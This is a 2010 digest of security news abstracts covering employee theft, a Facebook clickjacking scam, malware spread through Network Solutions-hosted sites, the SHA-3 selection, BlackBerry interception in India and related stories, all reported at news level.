| |
Business Leader Speaks Out About Employee Theft
Gainesville Sun (FL) (08/20/10) Voyles, Karen
Freddie Wehbe, owner of the Gator Domino's franchise in Florida, recently spoke to the Gainesville Area Chamber of Commerce about employee-theft prevention. According to Wehbe, his business lost more than $10,000 to an employee who was able to manipulate how pizzas were accounted and paid for. In order to prevent such an incident from repeating itself, Wehbe says he now requires drug testing and background checks for all employees and has hired an auditor. Other business leaders also recommend installing and using security cameras as well as physical security such as locks on storage areas. The FBI has identified employee theft as the fastest growing crime in America. The Association of Certified Fraud Examiners has determined that 7 percent of a business' gross sales revenue is lost to internal theft or shrinkage and the average organization loses more than $9 a day per employee because of fraud and abuse. According to the U.S. Chamber of Commerce, nearly a third of all business failures are directly related to employee theft.
Guard Suspended for Tackling Deaf Shoplifting Suspect
CNN.com (08/19/10) Duke, Alan
A security guard at a Forever 21 store in Los Angeles has been suspended indefinitely after he allegedly used excessive force against a deaf shoplifting suspect earlier this month. The suspension stems from an incident that took place on Aug. 7, in which the security guard tackled 28-year-old Alejandro Rea after the store's alarms indicated that he had stolen an item. Witnesses have said that the security guard put Rea in a choke hold that was so strong that he went limp and turned purple. Those who witnessed the incident also said that Rea was trying to communicate with the guard that he was submitting. The security guard then allegedly took Rea back into the store's office and threw him against the wall, injuring him. Pablo Rea, who is Alejandro's brother and was one of the individuals who witnessed the incident, said the amount of force used by the guard was unnecessary because Alejandro could not hear the alarms or the guard's commands to stop. Pablo Rea added that the security guard should have simply tapped Alejandro on the shoulder to get his attention.
Just 5 Percent of High Street Retailers Are PCI Compliant
Online Recruitment (08/17/10)
High street retailers in the United Kingdom do not take online security seriously enough, according to payment industry experts who participated in a recent roundtable discussion on the PCI Data Security Standard. For example, consultant Graham Boler noted that only about 5 percent of high street retailers have complied with PCI DSS. Meanwhile, only 9 percent of Level 1 U.K. retailers, or those that handle 6 million transactions or more per year, were compliant with PCI DSS, according to figures released by Visa. In an effort to encourage more retailers to adopt PCI DSS, Visa is raising the fees it charges for data breaches. Although the number of British retailers that are complying with PCI DSS is still small, a growing number are taking steps to protect consumers' payment card data. For example, the number of companies that said they stored card authentication data fell by 2.5 percent in January this year.
Under Threat From Mexican Drug Cartels, Reporters Go Silent
Los Angeles Times (08/16/10) Wilkinson, Tracy
Many Mexican reporters have stopped covering the escalating drug war in Mexico due to threats from the cartels while others have begun publishing only the stories that the cartels request. Approximately 30 reporters have been killed or have disappeared since President Felipe Calderon launched a military-led offensive against the country's powerful drug cartels in December 2006. This violence appears to be getting worse following the July 26 kidnapping of four reporters. In fact, the situation is so severe that the United Nations has sent its first mission to Mexico to examine dangers to freedom of expression. The reporters themselves are also mobilizing, gathering on Aug. 7 to demonstrate against the killings and demand safer working conditions. When asked to comment on the ongoing violence an unnamed editor in Reynosa, Tamaulipas, said, "We don't like the silence. But it's survival." Social media has stepped up to fill the silence through Twitter and anonymous blogs, but residents say that such sources are too often unreliable because they are overtaken by drug traffickers hoping to spread further panic.
Apple Manager Charged with Taking Kickbacks
Reuters (08/16/10) Shumaker, Lisa
Reuters (Aug. 16, Shumaker) has learned that Paul Shin Devine, a global supply manager at Apple Inc. since 2005, has been charged with taking kickbacks he received after leaking corporate secrets to Asian companies that supplied iPhone and iPod accessories. He is also facing a civil suit filed by Apple, which accuses him of receiving more than $1 million in payments and bribes after using his position within the company to obtain confidential information that he shared with suppliers. He was charged in a federal grand jury indictment with 23 counts of wire fraud, money laundering, conspiracy, and accepting kickbacks.
Caller Sought Whose Hijack Threat Grounded Flight
Associated Press (08/20/10)
Investigators are looking into a hoax threat that was made against an American Airlines flight from San Francisco to New York on Thursday. According to police, a clerk at a business in the San Francisco suburb of Alameda received an anonymous phone call from someone who threatened the flight on Thursday morning. The clerk reported the threat to the police at about 9 a.m., though the flight was allowed to leave the gate about an hour later. Several minutes later, the plane was ordered to taxi to a remote section of the tarmac, where it sat for several hours. The plane was then searched, and two passengers on board--a man and a woman who were reportedly from Pakistan--were taken off the aircraft in handcuffs. The FBI refused to say why the two passengers were taken off the plane, though the couple said that authorities told them that they had been chosen at random for questioning. Meanwhile, the other passengers onboard were taken off the plane and were screened by San Francisco police officers. The FBI eventually determined that the threat was a hoax, and all the passengers on board--including the couple that had been handcuffed--were allowed to rebook their flights.
India Testing Ways to Access BlackBerry Emails: Source
Reuters (08/19/10) Majumdar, Bappa
A technical team from BlackBerry maker Research in Motion is in New Delhi helping the Indian government determine how it can access secure messages sent by users of the smartphone. According to RIM, the only time the Indian government would be able to intercept secure e-mail messages is when they are temporarily stored in a decrypted form in a BlackBerry Enterprise server. The e-mails cannot be decrypted at any other time, since RIM does not have a master key that controls all the systems in its network. As a result, Indian authorities are trying to determine whether they have the technological capability to access BlackBerry Enterprise e-mails when they are stored in the server. The effort comes less than two weeks ahead of RIM's Aug. 31 deadline to provide the Indian government with the ability to read BlackBerry Enterprise e-mails, as well as messages sent via the BlackBerry Messenger service. India has said that it needs to be able to access the messages in order to prevent militants from using the BlackBerry network as a tool in carrying out terrorist attacks. If RIM fails to provide India with a solution for accessing the messages by Aug. 31, BlackBerry services in the country will be shut down.
DHS Examines Behavior of Biological, Chemical Agents in Subways
Homeland Security Today (08/10) McCarter, Mickey
The Department of Homeland Security in August is planning to conduct tests in Boston to help improve defenses against terrorist attacks on the nation's subway systems. During the tests, DHS will release a non-toxic gas and particle tracers in Boston's subway system to determine how airborne particles from biological or chemical agents released in a terrorist attack behave. In the previous phase of the test, which was conducted in Boston in December, DHS found that biological and chemical agents were capable of quickly spreading through a subway system. In addition, the first phase of the test found that biological and chemical agents behaved differently underground than they did above ground. For example, DHS noticed that biological agents that were released underground would cling to surfaces, while chemical agents in the form of gas would drift around corners. DHS hopes to use the results from the test for a variety of purposes, including developing evacuation, ventilation, and incident response plans. In addition, DHS hopes the test results will be used to develop systems that are capable of detecting chemical and biological agents.
Terrorist Tapes Found Under CIA Desk
Associated Press (08/17/10)
The CIA has revealed the existence of video and audio tapes of Sept. 11 plotter Ramzi Binalshibh being interrogated in a secret prison in Morocco. The taped interviews, which provided the CIA with intelligence about a terrorist plot to crash aircraft into London's Heathrow Airport, were discovered in a box under a desk in the CIA's Counterterrorism Center in 2007. The Justice Department is now looking into why the government told federal judges that the tapes did not exist. The discovery of the tapes could make it difficult for the U.S. to prosecute Binalshibh for his role in the Sept. 11 attacks. In addition, the tapes could provide information about Morocco's role in a CIA counterterrorism program that allowed the agency to detain terrorists in secret prisons and send them to other countries. Morocco's role in that program has been criticized because the African nation's prisons have a history of torture, forced disappearances, poor conditions, and sexual violence. Morocco's security forces have also been accused of torturing detainees. However, U.S. officials have said that waterboarding and other harsh interrogation techniques were not used in the Morocco prison, and that the facility was only used to hold detainees for several months. But much of the information contained in the tapes might not ever be revealed in court, since Binalshibh has asked to plead guilty and will not likely be tried.
'Border Bill' Only Starts to Solve Security Issues
Daily Caller (08/16/10) Boyle, Matthew
President Obama signed a bill on Aug. 13 that will provide $600 million in additional funding for 1,500 new agents and new unmanned surveillance drones along the U.S.-Mexico border. However, some members of Congress say the bill must only be seen as the start of a long-term border security solution. Phil Jordan, former director of the El Paso Intelligence Center (EPIC), supports this position, saying that the border security issue cannot be solved merely by throwing in millions in funding and resources. "After the elections, the fear-mongers and [Arizona Sen. John] McCains of the world will put it [border security] on the back-burner and forget about it," he said. "Fear-mongering can only help the drug cartels organize crime because it redirects resources to places where they're ineffective. Washington has always disregarded the border until elections." Jordan recommends redirecting all National Guard resources to federal agencies operating in the area because the National Guard is not empowered to arrest suspects. He also says that the federal government needs to be aware that al-Qaida is well positioned to take advantage of Mexico's political and social instability by crossing the porous U.S.-Mexico border.
NIST Is Nearly Ready to Pick the Next Hash Algorithm
Government Computer News (08/18/10) Jackson, William
Developers of the 14 semifinalist algorithms for the new SHA-3 Secure Hash Algorithm standard will defend their work at the second U.S. National Institute of Standards and Technology (NIST) candidate conference. The final selection for a new standard hashing algorithm for the federal government is expected by early 2012, says NIST's Bill Burr. "All in all we've got quite a bit of performance data," Burr says. "At this point, we have a surprising amount of data on hardware implementation on all 14 candidates." SHA-3 will augment the algorithms specified in Federal Information Processing Standard 180-2, which includes SHA-1 as well as SHA-224, SHA-256, SHA-384, and SHA-512, collectively known as SHA-2. The conference will give the entrants an opportunity to address the results of the analysis and testing over the past year. The field of 14 will eventually be narrowed down to a final five algorithms, which will be analyzed and tested again before the final choice is made in the winter of 2012.
Clickjacking Threat Punts Facebook Survey Scam
The Register (UK) (08/18/10) Leyden, John
Sophos is warning Facebook users to beware of a new scam that is circulating on the social networking site. The scam uses Facebook fan pages with eye-catching content to automatically push malicious script from an external domain onto users' computers. After the script has been downloaded, victims unwittingly share the fan page with their friends and contacts in Facebook, thereby luring other people into the scam. In addition, the Facebook fan pages ask victims to complete a survey before they can view the page's content. It is believed that those behind the scam are being paid by shady marketing firms each time a user completes one of the surveys. Victims are also asked to enter their cell phone numbers to enroll in a subscription service that automatically renews for $5 per week. However, victims generally do not realize that they are enrolling in an automatically renewing subscription service, since the details of terms and conditions of enrollment are included in the fine print on the fan page. Meanwhile, Facebook has been working to stop the scam by deleting the fraudulent fan pages. In addition, Sophos has blocked the domain that is hosting the malicious code used in the scam.
Chasm Between Expectation and Reality in Public-Private Cybersecurity Info Sharing
Fierce Government IT (08/18/10) Perera, David
A recent Government Accountability Office (GAO) report found that nearly all private-sector representatives who participate in federal public-private cybersecurity information sharing believe that the government should share their information in a timely manner. However, 27 percent of the 56 representatives surveyed said they were receiving a great or moderate amount of such information. Eighty-seven percent of private-sector representatives also said they expected access to classified or sensitive information while 16 percent said they received it. Additionally, 78 percent said they expect a secure information-sharing mechanism but only 21 percent said such a mechanism is in use. In response to the GAO report, Department of Homeland Security officials voiced concern that sharing sensitive information with the private sector could cause it to be distributed openly and globally. They explained that because restrictions placed on the United States Computer Emergency Readiness Team (USCERT) do not allow US CERT to make distinctions between private sector entities, it is difficult for the organization to formally share specific information.
Employees Still Pose Biggest Security Threat, Survey Finds
NextGov.com (08/17/10) Aitoro, Jill R.
Agency workers pose the greatest threat to cybersecurity, giving foreign entities and other perpetrators entree to sensitive networks, according to findings of a PacketMotion survey of security professionals. The majority of the 22 federal polled security experts cited employees as the most likely to swipe sensitive data because failure to adhere to policies combined with lax oversight often permits easy access to data. The survey's findings reflect "the reality that the [perpetrator] will hijack or use the credentials of internal users," says PacketMotion's Jonathan Gohstand. Nearly six in 10 survey respondents said employees constitute the biggest threat to the federal enterprise computing environment, and 14 percent named administrators who have been given access to certain networks and files as risks as well. Eighteen percent said contractors and other outsiders were the most prevalent security threat, while just 9 percent named hackers and cybercrooks.
Malicious Widget Hacked Millions of Web Sites
Computerworld (08/16/10) Keizer, Gregg
As many as 5 million Web sites hosted by Network Solutions may be infected with malware and may be pushing that malware on to visitors' machines, according to Armorize Technology researchers. Armorize's Wayne Huang says the source of the infections is a widget that Network Solutions installed on its GrowSmartBusiness.com Web site. The widget also was automatically installed on parked domains hosted by Network Solutions, Huang notes. When users visited one of these sites, the domain launched a drive-by attack that executed the "Nuke" toolkit against those using Internet Explorer, Firefox, Chrome, and Opera. If the toolkit successfully hacked the browser, a Trojan downloader was placed on computers running Windows. Users' searches were also redirected and pop-up advertisements began appearing on their screens. The motivation for the attack may have been financial, since the attackers were making money from the ads that appeared on victims' computer screens, Huang says. Meanwhile, Network Solutions, which disputes Armorize's assertion that 5 million of its Web sites are infected with malware, has disabled the widget on its parked domains and has taken the GrowSmartBusiness.com site off the Web.
Abstracts Copyright © 2010 Information, Inc. Bethesda, MD |
No comments:
Post a Comment